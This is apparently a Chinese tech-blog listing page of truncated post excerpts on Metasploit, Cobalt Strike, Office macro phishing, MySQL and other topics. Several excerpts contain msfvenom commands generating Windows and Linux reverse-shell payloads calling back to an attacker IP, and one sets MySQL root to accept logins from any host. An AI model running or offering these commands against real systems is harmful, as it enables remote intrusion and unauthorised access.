PowerShell 管理员命令 Get-WmiObject -class MSFC_FCAdapterHBAAttributes -namespace "root\WMI" | ForEach-Object {(($_.NodeWWN) | ForEach-Object {"{0:x}" -f $ ...
主要通过 msf 中 exploit 的 web_delivery 模块来实现此功能 0x01 前提背景 目标设备存在远程文件包含漏洞或者命令注入漏洞,想在目标设备上加载webshell,但不想在目标设备硬盘上留下任何webshell文件信息 解决思路:让目标设备从远端服务器加载webshell代码 ...
分类:
其他好文 时间:
2019-12-16 09:23:05
阅读次数:
113
这里只做记录,不做详解 0x00 实验环境 被控制机:192.168.126.129 Metasploit:192.168.126.128 Cobaltstrike:182. . . 0x01 CS会话转到MSF 0x02 MSF会话转到CS ...
分类:
Web程序 时间:
2019-12-04 17:14:43
阅读次数:
169
在启动msf是遇到以下问题! [-] * WARNING: No database support: No database YAML file 这是由于postgresql 未进行postgresql 的初始化配置,所以报错没有这个数据库。 解决问题 启动 msf ,初始化数据库配置信息。 利用命 ...
分类:
数据库 时间:
2019-12-01 22:32:07
阅读次数:
379
MySQL开启远程访问 将host字段的值改为%就表示在任何客户端机器上能以root用户登录到mysql服务器,建议在开发时设为%。 update user set host = ’%’ where user = ’root’; 将权限改为ALL PRIVILEGES mysql> use mysq ...
分类:
数据库 时间:
2019-11-26 22:54:23
阅读次数:
102
知识铺: 致力于打造轻知识点,持续更新每次的知识点较少,阅读不累。不占太多时间,不停的来唤醒你记忆深处的知识点。 一、GC回收器的 4个指标: 1.Throughput,非gc时间与总运行时间的比重。 2.Pauses,gc过程中程序的暂停次数,暂停平均时长,最大时长。 3.Footprint ,当 ...
分类:
编程语言 时间:
2019-11-26 22:39:30
阅读次数:
111
背景: 最近忙的飞起,各种事情,不想吐槽,因为某些事情,还吃了口屎,啧啧啧。。。。。 常见的钓鱼,社工基本技术都是这种,什么鱼叉,水坑,社工,投毒之类的,APT 攻击惯用伎俩。 那么今天主要利用Windows office 宏进行远程攻击。 环境: kail Linux 2018 xface Win ...
0x00 Windows,Linux反弹shell生成 Windows: msfvenom -p windows/meterpreter/reverse_tcp lhost=[你的IP] lport=[端口] -f exe > 保存路径 Linux: msfvenom -p linux/x86/me ...
分类:
其他好文 时间:
2019-11-16 14:14:37
阅读次数:
138
1.msf连接数据库 service postgresql start(postgresql默认用户名scott,密码tiger) msf db_connect 用户名:密码@127.0.0.1/msfbook msf help msf db_status //状态是否连接 msf db_impor ...
分类:
Web程序 时间:
2019-11-07 11:31:29
阅读次数:
137
1、查看该模块的可用参数 msfvenom -p windows/shell_reverse_tcp --list-options 2、生成攻击载荷 msfvenom -p windows/shell_reverse_tcp LHOST=10.180.7.20 LPORT=31337 -f exe ...
分类:
其他好文 时间:
2019-10-31 20:07:52
阅读次数:
109
